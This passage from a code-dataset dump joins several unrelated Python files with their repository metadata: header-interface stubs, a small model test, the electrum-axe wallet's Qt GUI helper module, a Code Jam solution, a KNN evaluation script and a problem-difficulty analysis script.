@abc.abstractmethod def retrieve(self, name): ''' Get the raw header value. @param name: string The name of the header to retrieve. @return: string|None The raw header value or None if there is no such header. ''' @abc.abstractmethod def decode(self, name): ''' Get the decoded the header value. @param name: string The name of the header to decode. @return: list[tuple(string, dictionary{string:string})] A list of tuples having as the first entry the header value and the second entry a dictionary with the value attribute. ''' class IEncoderHeader(metaclass=abc.ABCMeta): ''' Provides the header encoding. ''' @abc.abstractmethod def encode(self, name, *value): ''' Encodes the header values. ex: convert('multipart/formdata', 'mixed') == 'multipart/formdata, mixed' convert(('multipart/formdata', ('charset', 'utf-8'), ('boundry', '12))) == 'multipart/formdata; charset=utf-8; boundry=12' @param name: string The name of the header to set. @param value: arguments[tuple(string, tuple(string, string))|string] Tuples containing as first value found in the header and as the second value a tuple with the values attribute. '''
db7daaad0a903a177dcefeb07c6912390cdeb411
b5fa959a5a1a6cd1e5027e41ed45b6dfb1c19151
/testapp/tests/test_models.py
63eb981a166d436d958ec9b87a1b3dde0dbd614a
[ "MIT" ]
permissive
Mikekh84/learning-journal
13c8e036620d4286f7e6bf3c1d9df0c5e0d368d8
d0d5af7913790ab895a2fa530aa259cf2934f49b
refs/heads/master
2021-01-17T17:12:15.009156
2016-03-28T02:50:48
2016-03-28T02:50:48
54,362,834
0
1
null
2016-03-28T02:50:48
2016-03-21T05:43:15
Python
UTF-8
Python
false
false
511
py
# -*- coding: utf-8 -*- from testapp.models import Entry, DBSession, render_markdown def test_create_entry(dbtransaction): """Test for a change of state of the model.""" new_model = Entry(title="jill", text='jello') assert new_model.id is None DBSession.add(new_model) DBSession.flush() assert new_model.id is not None def test_render_markdown(): """Assert render markdown works.""" content = 'Hello' output = render_markdown(content) assert output == '<p>Hello</p>'
01fcb935acc0135bfe239ab840b1a23d21b0ad2f
cb79e16729aba7d2ce04a2501cf51bcb4655bc34
/electrum_axe/gui/qt/util.py
f27835254f268f16de26faf1512143716c5095f9
[ "MIT" ]
permissive
ddude1/electrum-axe
ecdf69fe1ea4dd28da4817587049920a253974db
b2d030dfc2afb2ca27739b9169ac610c68421dbb
refs/heads/master
2020-12-14T16:31:00.997749
2019-12-16T05:14:40
2019-12-16T05:14:40
127,673,858
0
0
MIT
2020-01-18T22:36:07
2018-04-01T21:45:54
Python
UTF-8
Python
false
false
31,415
py
import asyncio import os.path import time import sys import platform import queue import traceback import os import webbrowser from functools import partial, lru_cache from typing import NamedTuple, Callable, Optional, TYPE_CHECKING, Union, List, Dict from PyQt5.QtGui import (QFont, QColor, QCursor, QPixmap, QStandardItem, QPalette, QIcon, QFontMetrics) from PyQt5.QtCore import (Qt, QPersistentModelIndex, QModelIndex, pyqtSignal, QCoreApplication, QItemSelectionModel, QThread, QSortFilterProxyModel, QSize, QLocale) from PyQt5.QtWidgets import (QPushButton, QLabel, QMessageBox, QHBoxLayout, QAbstractItemView, QVBoxLayout, QLineEdit, QStyle, QDialog, QGroupBox, QButtonGroup, QRadioButton, QFileDialog, QWidget, QToolButton, QTreeView, QPlainTextEdit, QHeaderView, QApplication, QToolTip, QTreeWidget, QStyledItemDelegate) from electrum_axe.i18n import _, languages from electrum_axe.util import (FileImportFailed, FileExportFailed, resource_path) from electrum_axe.paymentrequest import PR_UNPAID, PR_PAID, PR_EXPIRED if TYPE_CHECKING: from .main_window import ElectrumWindow if platform.system() == 'Windows': if platform.release() in ['7', '8', '10']: MONOSPACE_FONT = 'Consolas' else: MONOSPACE_FONT = 'Lucida Console' elif platform.system() == 'Darwin': MONOSPACE_FONT = 'Menlo' else: MONOSPACE_FONT = 'monospace' dialogs = [] pr_icons = { PR_UNPAID:"unpaid.png", PR_PAID:"confirmed.png", PR_EXPIRED:"expired.png" } pr_tooltips = { PR_UNPAID:_('Pending'), PR_PAID:_('Paid'), PR_EXPIRED:_('Expired') } expiration_values = [ (_('1 hour'), 60*60), (_('1 day'), 24*60*60), (_('1 week'), 7*24*60*60), (_('Never'), None) ] class EnterButton(QPushButton): def __init__(self, text, func): QPushButton.__init__(self, text) self.func = func self.clicked.connect(func) def keyPressEvent(self, e): if e.key() == Qt.Key_Return: self.func() class ThreadedButton(QPushButton): def __init__(self, text, task, on_success=None, on_error=None): QPushButton.__init__(self, text) self.task = task self.on_success = on_success self.on_error = on_error self.clicked.connect(self.run_task) def run_task(self): self.setEnabled(False) self.thread = TaskThread(self) self.thread.add(self.task, self.on_success, self.done, self.on_error) def done(self): self.setEnabled(True) self.thread.stop() class WWLabel(QLabel): def __init__ (self, text="", parent=None): QLabel.__init__(self, text, parent) self.setWordWrap(True) self.setTextInteractionFlags(Qt.TextSelectableByMouse) class HelpLabel(QLabel): def __init__(self, text, help_text): QLabel.__init__(self, text) self.help_text = help_text self.app = QCoreApplication.instance() self.font = QFont() def mouseReleaseEvent(self, x): custom_message_box(icon=QMessageBox.Information, parent=self, title=_('Help'), text=self.help_text) def enterEvent(self, event): self.font.setUnderline(True) self.setFont(self.font) self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor)) return QLabel.enterEvent(self, event) def leaveEvent(self, event): self.font.setUnderline(False) self.setFont(self.font) self.app.setOverrideCursor(QCursor(Qt.ArrowCursor)) return QLabel.leaveEvent(self, event) class HelpButton(QPushButton): def __init__(self, text): QPushButton.__init__(self, '?') self.help_text = text self.setFocusPolicy(Qt.NoFocus) self.setFixedWidth(round(2.2 * char_width_in_lineedit())) self.clicked.connect(self.onclick) def onclick(self): custom_message_box(icon=QMessageBox.Information, parent=self, title=_('Help'), text=self.help_text, rich_text=True) class InfoButton(QPushButton): def __init__(self, text): QPushButton.__init__(self, 'Info') self.help_text = text self.setFocusPolicy(Qt.NoFocus) self.setFixedWidth(6 * char_width_in_lineedit()) self.clicked.connect(self.onclick) def onclick(self): custom_message_box(icon=QMessageBox.Information, parent=self, title=_('Info'), text=self.help_text, rich_text=True) class Buttons(QHBoxLayout): def __init__(self, *buttons): QHBoxLayout.__init__(self) self.addStretch(1) for b in buttons: self.addWidget(b) class CloseButton(QPushButton): def __init__(self, dialog): QPushButton.__init__(self, _("Close")) self.clicked.connect(dialog.close) self.setDefault(True) class CopyButton(QPushButton): def __init__(self, text_getter, app): QPushButton.__init__(self, _("Copy")) self.clicked.connect(lambda: app.clipboard().setText(text_getter())) class CopyCloseButton(QPushButton): def __init__(self, text_getter, app, dialog): QPushButton.__init__(self, _("Copy and Close")) self.clicked.connect(lambda: app.clipboard().setText(text_getter())) self.clicked.connect(dialog.close) self.setDefault(True) class OkButton(QPushButton): def __init__(self, dialog, label=None): QPushButton.__init__(self, label or _("OK")) self.clicked.connect(dialog.accept) self.setDefault(True) class CancelButton(QPushButton): def __init__(self, dialog, label=None): QPushButton.__init__(self, label or _("Cancel")) self.clicked.connect(dialog.reject) class MessageBoxMixin(object): def top_level_window_recurse(self, window=None, test_func=None): window = window or self classes = (WindowModalDialog, QMessageBox) if test_func is None: test_func = lambda x: True for n, child in enumerate(window.children()): # Test for visibility as old closed dialogs may not be GC-ed. # Only accept children that confirm to test_func. if isinstance(child, classes) and child.isVisible() \ and test_func(child): return self.top_level_window_recurse(child, test_func=test_func) return window def top_level_window(self, test_func=None): return self.top_level_window_recurse(test_func) def question(self, msg, parent=None, title=None, icon=None, **kwargs) -> bool: Yes, No = QMessageBox.Yes, QMessageBox.No return Yes == self.msg_box(icon=icon or QMessageBox.Question, parent=parent, title=title or '', text=msg, buttons=Yes|No, defaultButton=No, **kwargs) def show_warning(self, msg, parent=None, title=None, **kwargs): return self.msg_box(QMessageBox.Warning, parent, title or _('Warning'), msg, **kwargs) def show_error(self, msg, parent=None, **kwargs): return self.msg_box(QMessageBox.Warning, parent, _('Error'), msg, **kwargs) def show_critical(self, msg, parent=None, title=None, **kwargs): return self.msg_box(QMessageBox.Critical, parent, title or _('Critical Error'), msg, **kwargs) def show_message(self, msg, parent=None, title=None, **kwargs): return self.msg_box(QMessageBox.Information, parent, title or _('Information'), msg, **kwargs) def msg_box(self, icon, parent, title, text, *, buttons=QMessageBox.Ok, defaultButton=QMessageBox.NoButton, rich_text=False, checkbox=None): parent = parent or self.top_level_window() return custom_message_box(icon=icon, parent=parent, title=title, text=text, buttons=buttons, defaultButton=defaultButton, rich_text=rich_text, checkbox=checkbox) def custom_message_box(*, icon, parent, title, text, buttons=QMessageBox.Ok, defaultButton=QMessageBox.NoButton, rich_text=False, checkbox=None): if type(icon) is QPixmap: d = QMessageBox(QMessageBox.Information, title, str(text), buttons, parent) d.setIconPixmap(icon) else: d = QMessageBox(icon, title, str(text), buttons, parent) d.setWindowModality(Qt.WindowModal) d.setDefaultButton(defaultButton) if rich_text: d.setTextInteractionFlags(Qt.TextSelectableByMouse | Qt.LinksAccessibleByMouse) # set AutoText instead of RichText # AutoText lets Qt figure out whether to render as rich text. # e.g. if text is actually plain text and uses "\n" newlines; # and we set RichText here, newlines would be swallowed d.setTextFormat(Qt.AutoText) else: d.setTextInteractionFlags(Qt.TextSelectableByMouse) d.setTextFormat(Qt.PlainText) if checkbox is not None: d.setCheckBox(checkbox) return d.exec_() class WindowModalDialog(QDialog, MessageBoxMixin): '''Handy wrapper; window modal dialogs are better for our multi-window daemon model as other wallet windows can still be accessed.''' def __init__(self, parent, title=None): QDialog.__init__(self, parent) self.setWindowModality(Qt.WindowModal) if title: self.setWindowTitle(title) class WaitingDialog(WindowModalDialog): '''Shows a please wait dialog whilst running a task. It is not necessary to maintain a reference to this dialog.''' def __init__(self, parent, message, task, on_success=None, on_error=None): assert parent if isinstance(parent, MessageBoxMixin): parent = parent.top_level_window() WindowModalDialog.__init__(self, parent, _("Please wait")) vbox = QVBoxLayout(self) vbox.addWidget(QLabel(message)) self.accepted.connect(self.on_accepted) self.show() self.thread = TaskThread(self) self.thread.finished.connect(self.deleteLater) # see #3956 self.thread.add(task, on_success, self.accept, on_error) def wait(self): self.thread.wait() def on_accepted(self): self.thread.stop() def line_dialog(parent, title, label, ok_label, default=None): dialog = WindowModalDialog(parent, title) dialog.setMinimumWidth(500) l = QVBoxLayout() dialog.setLayout(l) l.addWidget(QLabel(label)) txt = QLineEdit() if default: txt.setText(default) l.addWidget(txt) l.addLayout(Buttons(CancelButton(dialog), OkButton(dialog, ok_label))) if dialog.exec_(): return txt.text() def text_dialog(parent, title, header_layout, ok_label, default=None, allow_multi=False): from .qrtextedit import ScanQRTextEdit dialog = WindowModalDialog(parent, title) dialog.setMinimumWidth(600) l = QVBoxLayout() dialog.setLayout(l) if isinstance(header_layout, str): l.addWidget(QLabel(header_layout)) else: l.addLayout(header_layout) txt = ScanQRTextEdit(allow_multi=allow_multi) if default: txt.setText(default) l.addWidget(txt) l.addLayout(Buttons(CancelButton(dialog), OkButton(dialog, ok_label))) if dialog.exec_(): return txt.toPlainText() class ChoicesLayout(object): def __init__(self, msg, choices, on_clicked=None, checked_index=0): vbox = QVBoxLayout() if len(msg) > 50: vbox.addWidget(WWLabel(msg)) msg = "" gb2 = QGroupBox(msg) vbox.addWidget(gb2) vbox2 = QVBoxLayout() gb2.setLayout(vbox2) self.group = group = QButtonGroup() for i,c in enumerate(choices): button = QRadioButton(gb2) button.setText(c) vbox2.addWidget(button) group.addButton(button) group.setId(button, i) if i==checked_index: button.setChecked(True) if on_clicked: group.buttonClicked.connect(partial(on_clicked, self)) self.vbox = vbox def layout(self): return self.vbox def selected_index(self): return self.group.checkedId() def address_field(addresses): hbox = QHBoxLayout() address_e = QLineEdit() if addresses and len(addresses) > 0: address_e.setText(addresses[0]) else: addresses = [] def func(): try: i = addresses.index(str(address_e.text())) + 1 i = i % len(addresses) address_e.setText(addresses[i]) except ValueError: # the user might have changed address_e to an # address not in the wallet (or to something that isn't an address) if addresses and len(addresses) > 0: address_e.setText(addresses[0]) button = QPushButton(_('Address')) button.clicked.connect(func) hbox.addWidget(button) hbox.addWidget(address_e) return hbox, address_e def filename_field(parent, config, defaultname, select_msg): vbox = QVBoxLayout() vbox.addWidget(QLabel(_("Format"))) gb = QGroupBox("format", parent) b1 = QRadioButton(gb) b1.setText(_("CSV")) b1.setChecked(True) b2 = QRadioButton(gb) b2.setText(_("json")) vbox.addWidget(b1) vbox.addWidget(b2) hbox = QHBoxLayout() directory = config.get('io_dir', os.path.expanduser('~')) path = os.path.join( directory, defaultname ) filename_e = QLineEdit() filename_e.setText(path) def func(): text = filename_e.text() _filter = "*.csv" if text.endswith(".csv") else "*.json" if text.endswith(".json") else None p, __ = QFileDialog.getSaveFileName(None, select_msg, text, _filter) if p: filename_e.setText(p) button = QPushButton(_('File')) button.clicked.connect(func) hbox.addWidget(button) hbox.addWidget(filename_e) vbox.addLayout(hbox) def set_csv(v): text = filename_e.text() text = text.replace(".json",".csv") if v else text.replace(".csv",".json") filename_e.setText(text) b1.clicked.connect(lambda: set_csv(True)) b2.clicked.connect(lambda: set_csv(False)) return vbox, filename_e, b1 class ElectrumItemDelegate(QStyledItemDelegate): def __init__(self, tv): super().__init__(tv) self.tv = tv self.opened = None def on_closeEditor(editor: QLineEdit, hint): self.opened = None def on_commitData(editor: QLineEdit): new_text = editor.text() idx = QModelIndex(self.opened) row, col = idx.row(), idx.column() _prior_text, user_role = self.tv.text_txid_from_coordinate(row, col) # check that we didn't forget to set UserRole on an editable field assert user_role is not None, (row, col) self.tv.on_edited(idx, user_role, new_text) self.closeEditor.connect(on_closeEditor) self.commitData.connect(on_commitData) def createEditor(self, parent, option, idx): self.opened = QPersistentModelIndex(idx) return super().createEditor(parent, option, idx) class MyTreeView(QTreeView): def __init__(self, parent: 'ElectrumWindow', create_menu, stretch_column=None, editable_columns=None): super().__init__(parent) self.parent = parent self.config = self.parent.config self.stretch_column = stretch_column self.setContextMenuPolicy(Qt.CustomContextMenu) self.customContextMenuRequested.connect(create_menu) self.setUniformRowHeights(True) # Control which columns are editable if editable_columns is None: editable_columns = {stretch_column} else: editable_columns = set(editable_columns) self.editable_columns = editable_columns self.setItemDelegate(ElectrumItemDelegate(self)) self.current_filter = "" self.setRootIsDecorated(False) # remove left margin self.toolbar_shown = False # When figuring out the size of columns, Qt by default looks at # the first 1000 rows (at least if resize mode is QHeaderView.ResizeToContents). # This would be REALLY SLOW, and it's not perfect anyway. # So to speed the UI up considerably, set it to # only look at as many rows as currently visible. self.header().setResizeContentsPrecision(0) def set_editability(self, items): for idx, i in enumerate(items): i.setEditable(idx in self.editable_columns) def selected_in_column(self, column: int): items = self.selectionModel().selectedIndexes() return list(x for x in items if x.column() == column) def current_item_user_role(self, col) -> Optional[QStandardItem]: idx = self.selectionModel().currentIndex() idx = idx.sibling(idx.row(), col) item = self.model().itemFromIndex(idx) if item: return item.data(Qt.UserRole) def set_current_idx(self, set_current: QPersistentModelIndex): if set_current: assert isinstance(set_current, QPersistentModelIndex) assert set_current.isValid() self.selectionModel().select(QModelIndex(set_current), QItemSelectionModel.SelectCurrent) def update_headers(self, headers: Union[List[str], Dict[int, str]]): # headers is either a list of column names, or a dict: (col_idx->col_name) if not isinstance(headers, dict): # convert to dict headers = dict(enumerate(headers)) col_names = [headers[col_idx] for col_idx in sorted(headers.keys())] model = self.model() model.setHorizontalHeaderLabels(col_names) self.header().setStretchLastSection(False) self.header().setDefaultAlignment(Qt.AlignCenter) for col_idx in headers: sm = QHeaderView.Stretch if col_idx == self.stretch_column else QHeaderView.ResizeToContents self.header().setSectionResizeMode(col_idx, sm) def keyPressEvent(self, event): if self.itemDelegate().opened: return if event.key() in [ Qt.Key_F2, Qt.Key_Return ]: self.on_activated(self.selectionModel().currentIndex()) return super().keyPressEvent(event) def on_activated(self, idx): # on 'enter' we show the menu pt = self.visualRect(idx).bottomLeft() pt.setX(50) self.customContextMenuRequested.emit(pt) def edit(self, idx, trigger=QAbstractItemView.AllEditTriggers, event=None): """ this is to prevent: edit: editing failed from inside qt """ return super().edit(idx, trigger, event) def on_edited(self, idx: QModelIndex, user_role, text): self.parent.wallet.set_label(user_role, text) self.parent.history_model.refresh('on_edited in MyTreeView') self.parent.update_completions() def should_hide(self, row): """ row_num is for self.model(). So if there is a proxy, it is the row number in that! """ return False def text_txid_from_coordinate(self, row_num, column): assert not isinstance(self.model(), QSortFilterProxyModel) idx = self.model().index(row_num, column) item = self.model().itemFromIndex(idx) user_role = item.data(Qt.UserRole) return item.text(), user_role def hide_row(self, row_num): """ row_num is for self.model(). So if there is a proxy, it is the row number in that! """ should_hide = self.should_hide(row_num) if not self.current_filter and should_hide is None: # no filters at all, neither date nor search self.setRowHidden(row_num, QModelIndex(), False) return for column in self.filter_columns: txt, _ = self.text_txid_from_coordinate(row_num, column) txt = txt.lower() if self.current_filter in txt: # the filter matched, but the date filter might apply self.setRowHidden(row_num, QModelIndex(), bool(should_hide)) break else: # we did not find the filter in any columns, hide the item self.setRowHidden(row_num, QModelIndex(), True) def filter(self, p=None): if p is not None: p = p.lower() self.current_filter = p self.hide_rows() def hide_rows(self): for row in range(self.model().rowCount()): self.hide_row(row) def create_toolbar(self, config=None): hbox = QHBoxLayout() buttons = self.get_toolbar_buttons() for b in buttons: b.setVisible(False) hbox.addWidget(b) hide_button = QPushButton('x') hide_button.setVisible(False) hide_button.pressed.connect(lambda: self.show_toolbar(False, config)) self.toolbar_buttons = buttons + (hide_button,) hbox.addStretch() hbox.addWidget(hide_button) return hbox def save_toolbar_state(self, state, config): pass # implemented in subclasses def show_toolbar(self, state, config=None): if state == self.toolbar_shown: return self.toolbar_shown = state if config: self.save_toolbar_state(state, config) for b in self.toolbar_buttons: b.setVisible(state) if not state: self.on_hide_toolbar() def toggle_toolbar(self, config=None): self.show_toolbar(not self.toolbar_shown, config) class ButtonsWidget(QWidget): def __init__(self): super(QWidget, self).__init__() self.buttons = [] def resizeButtons(self): frameWidth = self.style().pixelMetric(QStyle.PM_DefaultFrameWidth) x = self.rect().right() - frameWidth y = self.rect().bottom() - frameWidth for button in self.buttons: sz = button.sizeHint() x -= sz.width() button.move(x, y - sz.height()) def addButton(self, icon_name, on_click, tooltip): button = QToolButton(self) button.setIcon(read_QIcon(icon_name)) iconSize = QLineEdit().sizeHint().height() - 7 # 3px (button sz - icon sz), 2px borders, 2px padding button.setIconSize(QSize(iconSize, iconSize)) button.setCursor(QCursor(Qt.PointingHandCursor)) button.setStyleSheet("QToolButton { border: none; hover {border: 1px} pressed {border: 1px} padding: 0px; }") button.setVisible(True) button.setToolTip(tooltip) button.clicked.connect(on_click) self.buttons.append(button) return button def addCopyButton(self, app): self.app = app self.addButton("copy.png", self.on_copy, _("Copy to clipboard")) def on_copy(self): self.app.clipboard().setText(self.text()) QToolTip.showText(QCursor.pos(), _("Text copied to clipboard"), self) class ButtonsLineEdit(QLineEdit, ButtonsWidget): def __init__(self, text=None): QLineEdit.__init__(self, text) self.buttons = [] def resizeEvent(self, e): o = QLineEdit.resizeEvent(self, e) self.resizeButtons() return o class ButtonsTextEdit(QPlainTextEdit, ButtonsWidget): def __init__(self, text=None): QPlainTextEdit.__init__(self, text) self.setText = self.setPlainText self.text = self.toPlainText self.buttons = [] def resizeEvent(self, e): o = QPlainTextEdit.resizeEvent(self, e) self.resizeButtons() return o class TaskThread(QThread): '''Thread that runs background tasks. Callbacks are guaranteed to happen in the context of its parent.''' class Task(NamedTuple): task: Callable cb_success: Optional[Callable] cb_done: Optional[Callable] cb_error: Optional[Callable] doneSig = pyqtSignal(object, object, object) def __init__(self, parent, on_error=None): super(TaskThread, self).__init__(parent) self.on_error = on_error self.tasks = queue.Queue() self.doneSig.connect(self.on_done) self.start() def add(self, task, on_success=None, on_done=None, on_error=None): on_error = on_error or self.on_error self.tasks.put(TaskThread.Task(task, on_success, on_done, on_error)) def run(self): while True: task = self.tasks.get() # type: TaskThread.Task if not task: break try: result = task.task() self.doneSig.emit(result, task.cb_done, task.cb_success) except BaseException: self.doneSig.emit(sys.exc_info(), task.cb_done, task.cb_error) def on_done(self, result, cb_done, cb_result): # This runs in the parent's thread. if cb_done: cb_done() if cb_result: cb_result(result) def stop(self): self.tasks.put(None) class ColorSchemeItem: def __init__(self, fg_color, bg_color): self.colors = (fg_color, bg_color) def _get_color(self, background): return self.colors[(int(background) + int(ColorScheme.dark_scheme)) % 2] def as_stylesheet(self, background=False): css_prefix = "background-" if background else "" color = self._get_color(background) return "QWidget {{ {}color:{}; }}".format(css_prefix, color) def as_color(self, background=False): color = self._get_color(background) return QColor(color) class ColorScheme: dark_scheme = False GREEN = ColorSchemeItem("#117c11", "#8af296") YELLOW = ColorSchemeItem("#897b2a", "#ffff00") RED = ColorSchemeItem("#7c1111", "#f18c8c") BLUE = ColorSchemeItem("#123b7c", "#8cb3f2") PURPLE = ColorSchemeItem("#8A2BE2", "#8A2BE2") DEFAULT = ColorSchemeItem("#818181", "white") @staticmethod def has_dark_background(widget): brightness = sum(widget.palette().color(QPalette.Background).getRgb()[0:3]) return brightness < (255*3/2) @staticmethod def update_from_widget(widget, force_dark=False): if force_dark or ColorScheme.has_dark_background(widget): ColorScheme.dark_scheme = True class AcceptFileDragDrop: def __init__(self, file_type=""): assert isinstance(self, QWidget) self.setAcceptDrops(True) self.file_type = file_type def validateEvent(self, event): if not event.mimeData().hasUrls(): event.ignore() return False for url in event.mimeData().urls(): if not url.toLocalFile().endswith(self.file_type): event.ignore() return False event.accept() return True def dragEnterEvent(self, event): self.validateEvent(event) def dragMoveEvent(self, event): if self.validateEvent(event): event.setDropAction(Qt.CopyAction) def dropEvent(self, event): if self.validateEvent(event): for url in event.mimeData().urls(): self.onFileAdded(url.toLocalFile()) def onFileAdded(self, fn): raise NotImplementedError() def import_meta_gui(electrum_window, title, importer, on_success): filter_ = "JSON (*.json);;All files (*)" filename = electrum_window.getOpenFileName(_("Open {} file").format(title), filter_) if not filename: return try: importer(filename) except FileImportFailed as e: electrum_window.show_critical(str(e)) else: electrum_window.show_message(_("Your {} were successfully imported").format(title)) on_success() def export_meta_gui(electrum_window, title, exporter): filter_ = "JSON (*.json);;All files (*)" filename = electrum_window.getSaveFileName(_("Select file to save your {}").format(title), 'electrum_{}.json'.format(title), filter_) if not filename: return try: exporter(filename) except FileExportFailed as e: electrum_window.show_critical(str(e)) else: electrum_window.show_message(_("Your {0} were exported to '{1}'") .format(title, str(filename))) def get_parent_main_window(widget): """Returns a reference to the ElectrumWindow this widget belongs to.""" from .main_window import ElectrumWindow for _ in range(100): if widget is None: return None if not isinstance(widget, ElectrumWindow): widget = widget.parentWidget() else: return widget return None def icon_path(icon_basename): return resource_path('gui', 'icons', icon_basename) @lru_cache(maxsize=1000) def read_QIcon(icon_basename): return QIcon(icon_path(icon_basename)) def get_default_language(): name = QLocale.system().name() return name if name in languages else 'en_UK' class FromList(QTreeWidget): def __init__(self, parent, create_menu): super().__init__(parent) self.setHeaderHidden(True) self.setMaximumHeight(300) self.setContextMenuPolicy(Qt.CustomContextMenu) self.customContextMenuRequested.connect(create_menu) self.setUniformRowHeights(True) # remove left margin self.setRootIsDecorated(False) self.setColumnCount(2) self.header().setStretchLastSection(False) sm = QHeaderView.ResizeToContents self.header().setSectionResizeMode(0, sm) self.header().setSectionResizeMode(1, sm) def char_width_in_lineedit() -> int: char_width = QFontMetrics(QLineEdit().font()).averageCharWidth() # 'averageCharWidth' seems to underestimate on Windows, hence 'max()' return max(9, char_width) def webopen(url: str): if sys.platform == 'linux' and os.environ.get('APPIMAGE'): # When on Linux webbrowser.open can fail in AppImage because it can't find the correct libdbus. # We just fork the process and unset LD_LIBRARY_PATH before opening the URL. # See #5425 if os.fork() == 0: del os.environ['LD_LIBRARY_PATH'] webbrowser.open(url) sys.exit(0) else: webbrowser.open(url) if __name__ == "__main__": app = QApplication([]) t = WaitingDialog(None, 'testing ...', lambda: [time.sleep(1)], lambda x: QMessageBox.information(None, 'done', "done")) t.start() app.exec_()
e218ccbde421b4913b280795d031f3fc87789818
15f321878face2af9317363c5f6de1e5ddd9b749
/solutions_python/Problem_199/773.py
30a001a8f7c676f7eb2fe925665c826df0915c48
[]
no_license
dr-dos-ok/Code_Jam_Webscraper
c06fd59870842664cd79c41eb460a09553e1c80a
26a35bf114a3aa30fc4c677ef069d95f41665cc0
refs/heads/master
2020-04-06T08:17:40.938460
2018-10-14T10:12:47
2018-10-14T10:12:47
null
0
0
null
null
null
null
UTF-8
Python
false
false
705
py
# Problem A. Oversized Pancake Flipper import os SOURCE = '%s/../Resources/Q1Al.in' % os.path.dirname(__file__) TARGET = '%s/../Resources/Q1Al.out' % os.path.dirname(__file__) INPUT = open(SOURCE).read().splitlines() OUTPUT = open(TARGET, 'w') T = int(INPUT.pop(0)) for t0 in xrange(T): print >> OUTPUT, 'Case #%d:' % (t0 + 1), S, K = INPUT.pop(0).split() A, K = ['+' == s for s in S], int(K) L = len(A) r = 0 for i, a in enumerate(A): if not a: if i + K > L: print >> OUTPUT, 'IMPOSSIBLE' break r += 1 for k in xrange(K): A[i+k] = not A[i+k] else: print >> OUTPUT, r
30bab34cfeff4c18f9f343631ed0cdb6410ae39a
baf3996414315ffb60470c40c7ad797bf4e6897f
/02_ai/1_ml/3_data_preparation/code/chapter_18/02_model_evaluation.py
c6093bdc54ef4415a5811861005577357adb543d
[ "MIT" ]
permissive
thiago-allue/portfolio
8fbbecca7ce232567aebe97c19944f444508b7f4
0acd8253dc7c5150fef9b2d46eead3db83ca42de
refs/heads/main
2023-03-15T22:10:21.109707
2022-09-14T17:04:35
2022-09-14T17:04:35
207,919,073
0
0
null
2019-11-13T18:18:23
2019-09-11T22:40:46
Python
UTF-8
Python
false
false
955
py
# evaluate knn on the raw diabetes dataset from numpy import mean from numpy import std from pandas import read_csv from sklearn.model_selection import cross_val_score from sklearn.model_selection import RepeatedStratifiedKFold from sklearn.neighbors import KNeighborsClassifier from sklearn.preprocessing import LabelEncoder # load dataset dataset = read_csv('pima-indians-diabetes.csv', header=None) data = dataset.values # separate into input and output columns X, y = data[:, :-1], data[:, -1] # ensure inputs are floats and output is an integer label X = X.astype('float32') y = LabelEncoder().fit_transform(y.astype('str')) # define and configure the model model = KNeighborsClassifier() # evaluate the model cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=3, random_state=1) n_scores = cross_val_score(model, X, y, scoring='accuracy', cv=cv, n_jobs=-1) # report model performance print('Accuracy: %.3f (%.3f)' % (mean(n_scores), std(n_scores)))
7bf358f112e3ef7aa77ff185a38d1f372ce35085
163bbb4e0920dedd5941e3edfb2d8706ba75627d
/Code/data_analyze.py
1b53f51941b2a5bab76c5647d28bf9d31e0e44bf
[]
no_license
AdamZhouSE/pythonHomework
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
ffc5606817a666aa6241cfab27364326f5c066ff
refs/heads/master
2022-11-24T08:05:22.122011
2020-07-28T16:21:24
2020-07-28T16:21:24
259,576,640
2
1
null
null
null
null
UTF-8
Python
false
false
3,937
py
""" 数据分析 详细研究过程见研究报告 """ import json import pandas as pd import numpy as np from decimal import Decimal pd.set_option('display.unicode.ambiguous_as_wide', True) pd.set_option('display.unicode.east_asian_width', True) def save_as_file(data: dict, filename): with open(filename, 'w', encoding='utf-8')as json_file: json.dump(data, json_file, ensure_ascii=False, indent=4) def get_difficulty(data): d = [] # 题目难度 u = [] # 上传率 li = [] # 代码行数 avg = [] avg_all = [] # 算术平均数 num_of_cases = [] for types in data.items(): avg.append(types[1]["avg_pass_rate"]) cor_pu = (types[1]["correlation_pu"]) # 通过率与上传率的相关系数 cor_pl = (types[1]["correlation_pl"]) # 通过率与代码行数的相关系数 for cases in types[1].items(): # 类别 if cases[0] == 'cases': print(types[0], len(cases[1])) num_of_cases.append([types[0], len(cases[1])]) for case in cases[1].items(): u.append(case[1]["up_rate"]*cor_pu) li.append(case[1]["avg_lines"]*cor_pl) d.append((1 - case[1]["pass_rate"])) # 1-该题通过率 avg_all.append(case[1]["pass_rate"]) # 映射到区间[1,5] d1 = map_to(1, 5, d) # 映射后的试题难度 u1 = map_to(1, 5, u) li1 = map_to(1, 5, li) final_d = [] for i in range(0, len(d1)): # 用上传次数和代码行数进行修正 final_d.append(get_final_d(d1[i], u1[i], li1[i], 0.846, 0.084)) cnt_easy = 0 cnt_medium = 0 cnt_hard = 0 for di in final_d: if 1 <= di < 2.2: # 通过率70% easy cnt_easy += 1 elif 2.2 <= di < 3.4: # 通过率70%-40% medium cnt_medium += 1 else: # 通过率40%以下 hard cnt_hard += 1 print("easy: ", cnt_easy, cnt_easy/882) print("medium: ", cnt_medium, cnt_medium/882) print("hard: ", cnt_hard, cnt_hard/882) print("难度系数均值:", np.mean(final_d)) print("修正前通过率均值:", np.mean(avg_all)) print("修正后均值:", 1-np.mean(map_to(0, 1, final_d))) print(avg) return final_d def get_final_d(k, m, n, alpha, beta): # 获取修正后的难度系数 return alpha*k + beta*m + (1-alpha-beta)*n def get_diff_by_degree(degree): # 根据难度系数获取题目难度 if 1 <= degree < 2.2: return "easy" elif 2.2 <= degree < 3.4: return "medium" else: return "hard" def geometric_mean(data): # 计算几何平均数 total = 1 for i in data: if i == 0: continue total *= Decimal(str(format(i, ".2f"))) # print(float(format(i, ".2f"))) return total ** Decimal(1.0/len(data)) def map_to(start, end, data): # 将数据映射到指定区间 d_min = np.min(data) d_max= np.max(data) res = [] for d in data: res.append(start+(end-start)/(d_max-d_min)*(d-d_min)) return res def get_result(data, final_d): res = {} i = 0 for types in data.items(): if types[0] not in res.keys(): res[types[0]] = {"cases": types[1]} for cid, case in types[1].items(): res[types[0]]["cases"][cid] = case res[types[0]]["cases"][cid]["degree"] = final_d[i] res[types[0]]["cases"][cid]["difficulty"] = get_diff_by_degree(final_d[i]) i += 1 print(i) return res if __name__ == "__main__": with open("../Data/final_data_v2.json", 'r', encoding="utf-8") as f: _data = json.loads(f.read()) final_data = get_difficulty(_data) with open("../Data/final_data.json", 'r', encoding="utf-8") as f: _data = json.loads(f.read()) 